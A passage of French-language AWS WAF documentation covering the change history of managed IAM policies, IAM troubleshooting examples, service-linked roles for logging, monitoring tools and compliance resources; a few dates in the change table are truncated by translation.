|  `AWSWAFConsoleReadOnlyAccess` Cette politique permet AWS WAF de gérer les ressources de AWS la console et d'autres AWS ressources en votre nom dans AWS WAF et dans les services intégrés. Détails dans la console IAM : [AWSWAFConsoleReadOnlyAccess](https://console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSWAFConsoleReadOnlyAccess$serviceLevelSummary).  |  Les autorisations suivantes ont été mises à jour :  [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/security-iam-awsmanpol.html) Les autorisations suivantes ont été ajoutées :  [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/security-iam-awsmanpol.html) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/security-iam-awsmanpol.html) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/security-iam-awsmanpol.html) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/security-iam-awsmanpol.html) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/security-iam-awsmanpol.html)  | 03/11/2025 | 
|  `AWSWAFConsoleFullAccess` Cette politique permet AWS WAF de gérer les ressources de AWS la console et d'autres AWS ressources en votre nom dans AWS WAF et dans les services intégrés. Détails dans la console IAM : [AWSWAFConsoleFullAccess](https://console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSWAFConsoleFullAccess$serviceLevelSummary).  |  Les autorisations suivantes ont été mises à jour :  [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/security-iam-awsmanpol.html) Les autorisations suivantes ont été ajoutées :  [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/security-iam-awsmanpol.html) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/security-iam-awsmanpol.html) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/security-iam-awsmanpol.html) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/security-iam-awsmanpol.html) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/security-iam-awsmanpol.html)  | 03/11/2025 | 
| `AWSWAFFullAccess` Cette politique permet AWS WAF de gérer les AWS ressources en votre nom dans AWS WAF et dans les services intégrés. Détails dans la console IAM : [AWSWAFFullAccès](https://console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSWAFFullAccess$serviceLevelSummary). |  Autorisations supplémentaires AssociateWeb ACL, DisassociateWeb ACL, GetWeb ACLFor Resource et ListResourcesForWeb ACL requises pour AWS Amplify.  | 05/05/2025 | 
| `AWSWAFReadOnlyAccess` Cette politique permet AWS WAF de gérer les AWS ressources en votre nom dans AWS WAF et dans les services intégrés. Pour plus de détails sur cette politique, consultez [AWSWAFReadOnlyAccess](https://console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSWAFReadOnlyAccess$serviceLevelSummary)la console IAM. |   GetWebACLForRessources d'autorisations et ListResourcesForWeb ACL ajoutées requises pour AWS Amplify.  | 05/05/2025 | 
|  `AWSWAFConsoleReadOnlyAccess` Cette politique permet AWS WAF de gérer les ressources de AWS la console et d'autres AWS ressources en votre nom dans AWS WAF et dans les services intégrés. Détails dans la console IAM : [AWSWAFConsoleReadOnlyAccess](https://console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSWAFConsoleReadOnlyAccess$serviceLevelSummary).  |  Les autorisations suivantes ont été ajoutées :  [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/security-iam-awsmanpol.html) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/security-iam-awsmanpol.html)  | 05/05/2025 | 
|  `AWSWAFConsoleFullAccess` Cette politique permet AWS WAF de gérer les ressources de AWS la console et d'autres AWS ressources en votre nom dans AWS WAF et dans les services intégrés. Détails dans la console IAM : [AWSWAFConsoleFullAccess](https://console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSWAFConsoleFullAccess$serviceLevelSummary).  |  Les autorisations suivantes ont été ajoutées :  [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/security-iam-awsmanpol.html) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/security-iam-awsmanpol.html)  | 05/05/2025 | 
| `WAFV2LoggingServiceRolePolicy` Cette politique permet d' AWS WAF écrire des journaux sur Amazon Data Firehose. Il n'est utilisé que si vous activez la journalisation.  Détails dans la console IAM : [WAFV2LoggingServiceRolePolicy](https://console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/aws-service-role/WAFV2LoggingServiceRolePolicy$serviceLevelSummary). |  Ajout d'une déclaration IDs (SID) aux paramètres d'autorisation dans le rôle lié au service auquel cette politique est attachée.   | 2024-06-03 | 
| `AWSServiceRoleForWAFV2Logging` Ce rôle lié à un service fournit des politiques d'autorisation qui permettent d' AWS WAF écrire des journaux sur Amazon Data Firehose.  Détails dans la console IAM : [AWSServiceRoleForWAFV2journalisation](https://console.aws.amazon.com/iam/home#/roles/details/AWSServiceRoleForWAFV2Logging). |  Ajout d'une déclaration IDs (Sids) aux paramètres des autorisations.   | 2024-06-03 | 
|  AWS WAF ajouts au suivi des modifications  |  AWS WAF a commencé à suivre les modifications apportées à la politique gérée `WAFV2LoggingServiceRolePolicy` et au rôle lié au service. `AWSServiceRoleForWAFV2Logging`   | 2024-06-03 | 
| `AWSWAFFullAccess` Cette politique permet AWS WAF de gérer les AWS ressources en votre nom dans AWS WAF et dans les services intégrés. Détails dans la console IAM : [AWSWAFFullAccès](https://console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSWAFFullAccess$serviceLevelSummary). |  Autorisations étendues pour ajouter des instances d'accès AWS vérifié aux types de ressources que vous pouvez utiliser pour vous protéger AWS WAF.  | 17/06/2023 | 
| `AWSWAFReadOnlyAccess` Cette politique permet AWS WAF de gérer les AWS ressources en votre nom dans AWS WAF et dans les services intégrés. Détails dans la console IAM : [AWSWAFReadOnlyAccess](https://console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSWAFReadOnlyAccess$serviceLevelSummary).  |  Autorisations étendues pour ajouter des instances d'accès AWS vérifié aux types de ressources que vous pouvez utiliser pour vous protéger AWS WAF.  | 17/06/2023 | 
|  `AWSWAFConsoleFullAccess` Cette politique permet AWS WAF de gérer les ressources de AWS la console et d'autres AWS ressources en votre nom dans AWS WAF et dans les services intégrés. Détails dans la console IAM : [AWSWAFConsoleFullAccess](https://console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSWAFConsoleFullAccess$serviceLevelSummary).  |  Autorisations étendues pour ajouter des instances d'accès AWS vérifié aux types de ressources que vous pouvez utiliser pour vous protéger AWS WAF.  | 17/06/2023 | 
|  `AWSWAFConsoleReadOnlyAccess` Cette politique permet AWS WAF de gérer les ressources de AWS la console et d'autres AWS ressources en votre nom dans AWS WAF et dans les services intégrés. Détails dans la console IAM : [AWSWAFConsoleReadOnlyAccess](https://console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSWAFConsoleReadOnlyAccess$serviceLevelSummary).  |  Autorisations étendues pour ajouter des instances d'accès AWS vérifié aux types de ressources que vous pouvez utiliser pour vous protéger AWS WAF.  | 17/06/2023 | 
| `AWSWAFFullAccess` Cette politique permet AWS WAF de gérer les AWS ressources en votre nom dans AWS WAF et dans les services intégrés. Détails dans la console IAM : [AWSWAFFullAccès](https://console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSWAFFullAccess$serviceLevelSummary). |  Autorisations étendues pour corriger les paramètres d'accès aux AWS App Runner services.  | 06/06/2023 | 
| `AWSWAFReadOnlyAccess` Cette politique permet AWS WAF de gérer les AWS ressources en votre nom dans AWS WAF et dans les services intégrés. Détails dans la console IAM : [AWSWAFReadOnlyAccess](https://console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSWAFReadOnlyAccess$serviceLevelSummary).  |  Autorisations étendues pour corriger les paramètres d'accès aux AWS App Runner services.  | 06/06/2023 | 
|  `AWSWAFConsoleFullAccess` Cette politique permet AWS WAF de gérer les ressources de AWS la console et d'autres AWS ressources en votre nom dans AWS WAF et dans les services intégrés. Détails dans la console IAM : [AWSWAFConsoleFullAccess](https://console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSWAFConsoleFullAccess$serviceLevelSummary).  |  Autorisations étendues pour corriger les paramètres d'accès aux AWS App Runner services.  | 06/06/2023 | 
|  `AWSWAFConsoleReadOnlyAccess` Cette politique permet AWS WAF de gérer les ressources de AWS la console et d'autres AWS ressources en votre nom dans AWS WAF et dans les services intégrés. Détails dans la console IAM : [AWSWAFConsoleReadOnlyAccess](https://console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSWAFConsoleReadOnlyAccess$serviceLevelSummary).  |  Autorisations étendues pour corriger les paramètres d'accès aux AWS App Runner services.  | 06/06/2023 | 
| `AWSWAFFullAccess` Cette politique permet AWS WAF de gérer les AWS ressources en votre nom dans AWS WAF et dans les services intégrés. Détails dans la console IAM : [AWSWAFFullAccès](https://console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSWAFFullAccess$serviceLevelSummary). |  Autorisations étendues pour ajouter AWS App Runner des services aux types de ressources que vous pouvez utiliser pour vous protéger AWS WAF.  | 30/1 | 
| `AWSWAFReadOnlyAccess` Cette politique permet AWS WAF de gérer les AWS ressources en votre nom dans AWS WAF et dans les services intégrés. Détails dans la console IAM : [AWSWAFReadOnlyAccess](https://console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSWAFReadOnlyAccess$serviceLevelSummary).  |  Autorisations étendues pour ajouter AWS App Runner des services aux types de ressources que vous pouvez utiliser pour vous protéger AWS WAF.  | 30/1 | 
|  `AWSWAFConsoleFullAccess` Cette politique permet AWS WAF de gérer les ressources de AWS la console et d'autres AWS ressources en votre nom dans AWS WAF et dans les services intégrés. Détails dans la console IAM : [AWSWAFConsoleFullAccess](https://console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSWAFConsoleFullAccess$serviceLevelSummary).  |  Autorisations étendues pour ajouter AWS App Runner des services aux types de ressources que vous pouvez utiliser pour vous protéger AWS WAF.  | 30/1 | 
|  `AWSWAFConsoleReadOnlyAccess` Cette politique permet AWS WAF de gérer les ressources de AWS la console et d'autres AWS ressources en votre nom dans AWS WAF et dans les services intégrés. Détails dans la console IAM : [AWSWAFConsoleReadOnlyAccess](https://console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSWAFConsoleReadOnlyAccess$serviceLevelSummary).  |  Autorisations étendues pour ajouter AWS App Runner des services aux types de ressources que vous pouvez utiliser pour vous protéger AWS WAF.  | 30/1 | 
| `AWSWAFFullAccess` Cette politique permet AWS WAF de gérer les AWS ressources en votre nom dans AWS WAF et dans les services intégrés. Détails dans la console IAM : [AWSWAFFullAccès](https://console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSWAFFullAccess$serviceLevelSummary). |  Autorisations étendues pour ajouter des groupes d'utilisateurs Amazon Cognito aux types de ressources que vous pouvez utiliser pour vous protéger. AWS WAF  | 08-25 | 
| `AWSWAFReadOnlyAccess` Cette politique permet AWS WAF de gérer les AWS ressources en votre nom dans AWS WAF et dans les services intégrés. Détails dans la console IAM : [AWSWAFReadOnlyAccess](https://console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSWAFReadOnlyAccess$serviceLevelSummary).  |  Autorisations étendues pour ajouter des groupes d'utilisateurs Amazon Cognito aux types de ressources que vous pouvez utiliser pour vous protéger. AWS WAF  | 08-25 | 
|  `AWSWAFConsoleFullAccess` Cette politique permet AWS WAF de gérer les ressources de AWS la console et d'autres AWS ressources en votre nom dans AWS WAF et dans les services intégrés. Détails dans la console IAM : [AWSWAFConsoleFullAccess](https://console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSWAFConsoleFullAccess$serviceLevelSummary).  |  Autorisations étendues pour ajouter des groupes d'utilisateurs Amazon Cognito aux types de ressources que vous pouvez utiliser pour vous protéger. AWS WAF  | 08-25 | 
|  `AWSWAFConsoleReadOnlyAccess` Cette politique permet AWS WAF de gérer les ressources de AWS la console et d'autres AWS ressources en votre nom dans AWS WAF et dans les services intégrés. Détails dans la console IAM : [AWSWAFConsoleReadOnlyAccess](https://console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSWAFConsoleReadOnlyAccess$serviceLevelSummary).  |  Autorisations étendues pour ajouter des groupes d'utilisateurs Amazon Cognito aux types de ressources que vous pouvez utiliser pour vous protéger. AWS WAF  | 08-25 | 
| `AWSWAFFullAccess` Cette politique permet AWS WAF de gérer les AWS ressources en votre nom dans AWS WAF et dans les services intégrés. Détails dans la console IAM : [AWSWAFFullAccès](https://console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSWAFFullAccess$serviceLevelSummary).  |  Correction des paramètres d'autorisation pour la livraison des journaux pour Amazon Simple Storage Service (Amazon S3) et Amazon CloudWatch Logs. Cette modification corrige les erreurs de refus d'accès survenues lors de la configuration de la journalisation. Pour plus d'informations sur la journalisation du trafic de votre pack de protection (ACL Web), consultez[Trafic du pack de AWS WAF protection de journalisation (ACL Web)](logging.md).  | 01/01/11 | 
|  `AWSWAFConsoleFullAccess` Cette politique permet AWS WAF de gérer les ressources de AWS la console et d'autres AWS ressources en votre nom dans AWS WAF et dans les services intégrés. Détails dans la console IAM : [AWSWAFConsoleFullAccess](https://console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSWAFConsoleFullAccess$serviceLevelSummary).  |  Correction des paramètres d'autorisation pour la livraison des journaux pour Amazon Simple Storage Service (Amazon S3) et Amazon CloudWatch Logs. Cette modification corrige les erreurs d'accès survenues lors de la configuration de la journalisation. Pour plus d'informations sur la journalisation du trafic de votre pack de protection (ACL Web), consultez[Trafic du pack de AWS WAF protection de journalisation (ACL Web)](logging.md).  | 01/01/11 | 
|  `AWSWAFFullAccess` Cette politique permet AWS WAF de gérer les AWS ressources en votre nom dans AWS WAF et dans les services intégrés. Détails dans la console IAM : [AWSWAFFullAccès](https://console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSWAFFullAccess$serviceLevelSummary).  |  Ajout de nouvelles autorisations pour des options de journalisation étendues. Cette modification donne AWS WAF accès aux destinations de journalisation supplémentaires Amazon Simple Storage Service (Amazon S3) et Amazon CloudWatch Logs. Pour plus d'informations sur la journalisation du trafic de votre pack de protection (ACL Web), consultez[Trafic du pack de AWS WAF protection de journalisation (ACL Web)](logging.md).  | 2021-11-15 | 
|  `AWSWAFConsoleFullAccess` Cette politique permet AWS WAF de gérer les ressources de AWS la console et d'autres AWS ressources en votre nom dans AWS WAF et dans les services intégrés. Détails dans la console IAM : [AWSWAFConsoleFullAccess](https://console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSWAFConsoleFullAccess$serviceLevelSummary).  |  Ajout de nouvelles autorisations pour des options de journalisation étendues. Cette modification donne AWS WAF accès aux destinations de journalisation supplémentaires Amazon Simple Storage Service (Amazon S3) et Amazon CloudWatch Logs. Pour plus d'informations sur la journalisation du trafic de votre pack de protection (ACL Web), consultez[Trafic du pack de AWS WAF protection de journalisation (ACL Web)](logging.md).  | 2021-11-15 | 
|  AWS WAF a commencé à suivre les modifications  |  AWS WAF a commencé à suivre les modifications apportées AWS à ses politiques gérées.  | 01-03-2021 | 

# Résolution des problèmes AWS WAF d'identité et d'accès
<a name="security_iam_troubleshoot"></a>

Utilisez les informations suivantes pour vous aider à diagnostiquer et à résoudre les problèmes courants que vous pouvez rencontrer lorsque vous travaillez avec AWS WAF IAM.

**Topics**
+ [Je ne suis pas autorisé à effectuer une action dans AWS WAF](#security_iam_troubleshoot-no-permissions)
+ [Je ne suis pas autorisé à effectuer iam : PassRole](#security_iam_troubleshoot-passrole)
+ [Je souhaite permettre à des personnes extérieures Compte AWS à moi d'accéder à mes AWS WAF ressources](#security_iam_troubleshoot-cross-account-access)

## Je ne suis pas autorisé à effectuer une action dans AWS WAF
<a name="security_iam_troubleshoot-no-permissions"></a>

Si vous recevez une erreur qui indique que vous n’êtes pas autorisé à effectuer une action, vos politiques doivent être mises à jour afin de vous permettre d’effectuer l’action.

L’exemple d’erreur suivant se produit quand l’utilisateur IAM `mateojackson` tente d’utiliser la console pour afficher des informations détaillées sur une ressource `my-example-widget` fictive, mais ne dispose pas des autorisations `wafv2:GetWidget` fictives.

```
User: arn:aws:iam::123456789012:user/mateojackson is not authorized to perform: wafv2:GetWidget on resource: my-example-widget
```

Dans ce cas, la politique qui s’applique à l’utilisateur `mateojackson` doit être mise à jour pour autoriser l’accès à la ressource `my-example-widget` à l’aide de l’action `wafv2:GetWidget`.

Si vous avez besoin d'aide, contactez votre AWS administrateur. Votre administrateur vous a fourni vos informations d’identification de connexion.

## Je ne suis pas autorisé à effectuer iam : PassRole
<a name="security_iam_troubleshoot-passrole"></a>

Si vous recevez une erreur selon laquelle vous n’êtes pas autorisé à exécuter `iam:PassRole` l’action, vos stratégies doivent être mises à jour afin de vous permettre de transmettre un rôle à AWS WAF.

Certains vous Services AWS permettent de transmettre un rôle existant à ce service au lieu de créer un nouveau rôle de service ou un rôle lié à un service. Pour ce faire, vous devez disposer des autorisations nécessaires pour transmettre le rôle au service.

L’exemple d’erreur suivant se produit lorsqu’un utilisateur IAM nommé `marymajor` essaie d’utiliser la console pour exécuter une action dans AWS WAF. Toutefois, l'action nécessite que le service ait des autorisations accordées par une fonction de service. Mary n'est pas autorisée à transmettre le rôle au service.

```
User: arn:aws:iam::123456789012:user/marymajor is not authorized to perform: iam:PassRole
```

Dans ce cas, les politiques de Mary doivent être mises à jour pour lui permettre d’exécuter l’action `iam:PassRole`.

Si vous avez besoin d'aide, contactez votre AWS administrateur. Votre administrateur vous a fourni vos informations d’identification de connexion.

## Je souhaite permettre à des personnes extérieures Compte AWS à moi d'accéder à mes AWS WAF ressources
<a name="security_iam_troubleshoot-cross-account-access"></a>

Vous pouvez créer un rôle que les utilisateurs provenant d’autres comptes ou les personnes extérieures à votre organisation pourront utiliser pour accéder à vos ressources. Vous pouvez spécifier qui est autorisé à assumer le rôle. Pour les services qui prennent en charge les politiques basées sur les ressources ou les listes de contrôle d'accès (ACLs), vous pouvez utiliser ces politiques pour autoriser les utilisateurs à accéder à vos ressources.

Pour plus d’informations, consultez les éléments suivants :
+ Pour savoir si ces fonctionnalités sont prises AWS WAF en charge, consultez[Comment AWS WAF fonctionne avec IAM](security_iam_service-with-iam.md).
+ Pour savoir comment fournir l'accès à vos ressources sur celles Comptes AWS que vous possédez, consultez la section [Fournir l'accès à un utilisateur IAM dans un autre utilisateur Compte AWS que vous possédez](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_common-scenarios_aws-accounts.html) dans le Guide de l'*utilisateur IAM*.
+ Pour savoir comment fournir l'accès à vos ressources à des tiers Comptes AWS, consultez la section [Fournir un accès à des ressources Comptes AWS détenues par des tiers](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_common-scenarios_third-party.html) dans le *guide de l'utilisateur IAM*.
+ Pour savoir comment fournir un accès par le biais de la fédération d’identité, consultez [Fournir un accès à des utilisateurs authentifiés en externe (fédération d’identité)](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_common-scenarios_federated-users.html) dans le *Guide de l’utilisateur IAM*.
+ Pour en savoir plus sur la différence entre l’utilisation des rôles et des politiques basées sur les ressources pour l’accès intercompte, consultez [Accès intercompte aux ressources dans IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies-cross-account-resource-access.html) dans le *Guide de l’utilisateur IAM*.

# Utilisation de rôles liés à un service pour AWS WAF
<a name="using-service-linked-roles"></a>

Cette section explique comment utiliser les rôles liés à un service pour donner AWS WAF accès aux ressources de votre AWS compte.

AWS WAF utilise des Gestion des identités et des accès AWS rôles liés à un [service](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_terms-and-concepts.html#iam-term-service-linked-role) (IAM). Un rôle lié à un service est un type unique de rôle IAM directement lié à. AWS WAF Les rôles liés au service sont prédéfinis par AWS WAF et incluent toutes les autorisations dont le service a besoin pour appeler d'autres AWS services en votre nom. 

Un rôle lié à un service facilite la configuration AWS WAF car vous n'avez pas à ajouter manuellement les autorisations nécessaires. AWS WAF définit les autorisations associées à ses rôles liés aux services et, sauf indication contraire, seul AWS WAF peut assumer ses rôles. Les autorisations définies comprennent la politique d'approbation et la politique d'autorisations. Cette politique d'autorisations ne peut pas être attachée à une autre entité IAM.

Vous ne pouvez supprimer un rôle lié à un service qu’après avoir supprimé les ressources connexes du rôle. Cela protège vos AWS WAF ressources car vous ne pouvez pas supprimer par inadvertance l'autorisation d'accès aux ressources.

Pour plus d’informations sur les autres services qui prennent en charge les rôles liés à un service, consultez [Services AWS qui fonctionnent avec IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_aws-services-that-work-with-iam.html) et recherchez les services avec un **Oui ** dans la colonne **Rôle lié à un service**. Choisissez un **Oui** ayant un lien permettant de consulter les détails du rôle pour ce service.

## Autorisations de rôle liées au service pour AWS WAF
<a name="slr-permissions"></a>

AWS WAF utilise le rôle lié au service `AWSServiceRoleForWAFV2Logging` pour écrire des journaux dans Amazon Data Firehose. Ce rôle n'est utilisé que si vous activez la connexion AWS WAF. Pour plus d’informations sur la journalisation, consultez [Trafic du pack de AWS WAF protection de journalisation (ACL Web)](logging.md).

Ce rôle lié au service est attaché à la politique AWS gérée. `WAFV2LoggingServiceRolePolicy` Pour plus d’informations sur la stratégie gérée, consultez [AWS politique gérée : WAFV2 LoggingServiceRolePolicy](security-iam-awsmanpol.md#security-iam-awsmanpol-WAFV2LoggingServiceRolePolicy).

Le rôle lié à un service `AWSServiceRoleForWAFV2Logging` fait confiance au service `wafv2.amazonaws.com` pour endosser le rôle. 

Les politiques d'autorisation du rôle permettent AWS WAF d'effectuer les actions suivantes sur les ressources spécifiées :
+ Actions Amazon Data Firehose : `PutRecord` et sur les ressources de flux de données `PutRecordBatch` Firehose dont le nom commence par. `aws-waf-logs-` Par exemple, `aws-waf-logs-us-east-2-analytics`.
+ AWS Organizations action : `DescribeOrganization` sur les ressources des organisations. 

[Consultez le rôle complet lié au service dans la console IAM : Journalisation. AWSService RoleFor WAFV2](https://console.aws.amazon.com/iam/home#/roles/details/AWSServiceRoleForWAFV2Logging)

Vous devez configurer les autorisations de manière à permettre à une entité IAM (comme un utilisateur, un groupe ou un rôle) de créer, modifier ou supprimer un rôle lié à un service. Pour en savoir plus, consultez [Service-Linked Role Permissions (autorisations du rôle lié à un service)](https://docs.aws.amazon.com/IAM/latest/UserGuide/using-service-linked-roles.html#service-linked-role-permissions) dans le *Guide de l’utilisateur IAM*.

## Création d'un rôle lié à un service pour AWS WAF
<a name="create-slr"></a>

Vous n’avez pas besoin de créer manuellement un rôle lié à un service. Lorsque vous activez la AWS WAF connexion au AWS Management Console, ou que vous faites une `PutLoggingConfiguration` demande dans la AWS WAF CLI ou l' AWS WAF API, le rôle lié au service est AWS WAF créé pour vous. 

Vous devez disposez de l'autorisation `iam:CreateServiceLinkedRole` pour activer la journalisation.

Si vous supprimez ce rôle lié à un service et que vous avez ensuite besoin de le recréer, vous pouvez utiliser la même procédure pour recréer le rôle dans votre compte. Lorsque vous activez la AWS WAF journalisation, le rôle lié au service est à nouveau AWS WAF créé pour vous. 

## Modification d'un rôle lié à un service pour AWS WAF
<a name="edit-slr"></a>

AWS WAF ne vous permet pas de modifier le rôle `AWSServiceRoleForWAFV2Logging` lié au service. Une fois que vous avez créé un rôle lié à un service, vous ne pouvez pas changer le nom du rôle, car plusieurs entités peuvent faire référence au rôle. Néanmoins, vous pouvez modifier la description du rôle à l’aide d’IAM. Pour en savoir plus, consultez [Modification d’un rôle lié à un service](https://docs.aws.amazon.com/IAM/latest/UserGuide/using-service-linked-roles.html#edit-service-linked-role) dans le *Guide de l’utilisateur IAM*.

## Supprimer un rôle lié à un service pour AWS WAF
<a name="delete-slr"></a>

Si vous n’avez plus besoin d’utiliser une fonctionnalité ou un service qui nécessite un rôle lié à un service, nous vous recommandons de supprimer ce rôle. De cette façon, vous n’avez aucune entité inutilisée qui n’est pas surveillée ou gérée activement. Cependant, vous devez nettoyer les ressources de votre rôle lié à un service avant de pouvoir les supprimer manuellement.

**Note**  
Si le AWS WAF service utilise le rôle lorsque vous essayez de supprimer les ressources, la suppression risque d'échouer. Si cela se produit, patientez quelques minutes et réessayez.

**Pour supprimer AWS WAF les ressources utilisées par le `AWSServiceRoleForWAFV2Logging`**

1. Sur la AWS WAF console, supprimez la journalisation de chaque ACL Web. Pour de plus amples informations, veuillez consulter [Trafic du pack de AWS WAF protection de journalisation (ACL Web)](logging.md).

1. Au moyen de l'API ou de l'interface de ligne de commande, envoyez une requête `DeleteLoggingConfiguration` pour chaque liste ACL web avec la journalisation activée. Pour plus d’informations, veuillez consulter [AWS WAF Référence d'API ](https://docs.aws.amazon.com/waf/latest/APIReference/Welcome.html).

**Pour supprimer manuellement le rôle lié au service à l’aide d’IAM**

Utilisez la console IAM, l’interface de ligne de commande IAM ou l’API IAM pour supprimer le rôle lié à un service `AWSServiceRoleForWAFV2Logging`. Pour en savoir plus, consultez [Suppression d’un rôle lié à un service](https://docs.aws.amazon.com/IAM/latest/UserGuide/using-service-linked-roles.html#delete-service-linked-role) dans le *Guide de l’utilisateur IAM*.

## Régions prises en charge pour les rôles AWS WAF liés à un service
<a name="slr-regions"></a>

AWS WAF prend en charge l'utilisation de rôles liés au service dans toutes les régions où le service est disponible. Pour plus d’informations, consultez [Points de terminaison et quotas AWS WAF](https://docs.aws.amazon.com/general/latest/gr/waf.html).

# Connexion et surveillance AWS WAF
<a name="waf-incident-response"></a>

Cette section explique comment utiliser les AWS outils de surveillance et de réponse aux événements dans AWS WAF.

La surveillance joue un rôle important dans le maintien de la fiabilité, de la disponibilité AWS WAF et des performances de vos AWS solutions. Vous devez collecter des données de surveillance provenant de toutes les parties de votre AWS solution afin de pouvoir corriger plus facilement une défaillance multipoint, le cas échéant. AWS fournit plusieurs outils pour surveiller vos AWS WAF ressources et répondre à des événements potentiels :

** CloudWatch Alarmes Amazon**  
À l'aide d' CloudWatch alarmes, vous observez une seule métrique sur une période que vous spécifiez. Si la métrique dépasse un seuil donné, CloudWatch envoie une notification à une rubrique ou AWS Auto Scaling à une politique Amazon SNS. Pour de plus amples informations, veuillez consulter [Surveillance avec Amazon CloudWatch](monitoring-cloudwatch.md).

**AWS CloudTrail journaux**  
CloudTrail fournit un enregistrement des actions entreprises par un utilisateur, un rôle ou un AWS service dans AWS WAF. À l'aide des informations collectées par CloudTrail, vous pouvez déterminer la demande qui a été faite AWS WAF, l'adresse IP à partir de laquelle la demande a été faite, qui a fait la demande, quand elle a été faite et des détails supplémentaires. Pour de plus amples informations, veuillez consulter [Journalisation des appels d'API AWS CloudTrail avec](logging-using-cloudtrail.md). 

**AWS WAF journalisation du trafic du pack de protection (ACL Web)**  
AWS WAF propose la journalisation du trafic analysé par vos packs de protection (Web ACLs). Les journaux incluent des informations telles que l'heure à laquelle la demande AWS WAF a été reçue de votre AWS ressource protégée, des informations détaillées sur la demande et le paramètre d'action pour la règle à laquelle la demande correspondait. Pour de plus amples informations, veuillez consulter [Trafic du pack de AWS WAF protection de journalisation (ACL Web)](logging.md). 

# Validation de la conformité dans AWS WAF
<a name="waf-compliance"></a>

Cette section explique votre responsabilité en matière de conformité lors de l'utilisation AWS WAF.

Pour savoir si un [programme Services AWS de conformité Service AWS s'inscrit dans le champ d'application de programmes de conformité](https://aws.amazon.com/compliance/services-in-scope/) spécifiques, consultez Services AWS la section de conformité et sélectionnez le programme de conformité qui vous intéresse. Pour des informations générales, voir Programmes de [AWS conformité Programmes AWS](https://aws.amazon.com/compliance/programs/) de .

Vous pouvez télécharger des rapports d'audit tiers à l'aide de AWS Artifact. Pour plus d'informations, voir [Téléchargement de rapports dans AWS Artifact](https://docs.aws.amazon.com/artifact/latest/ug/downloading-documents.html) .

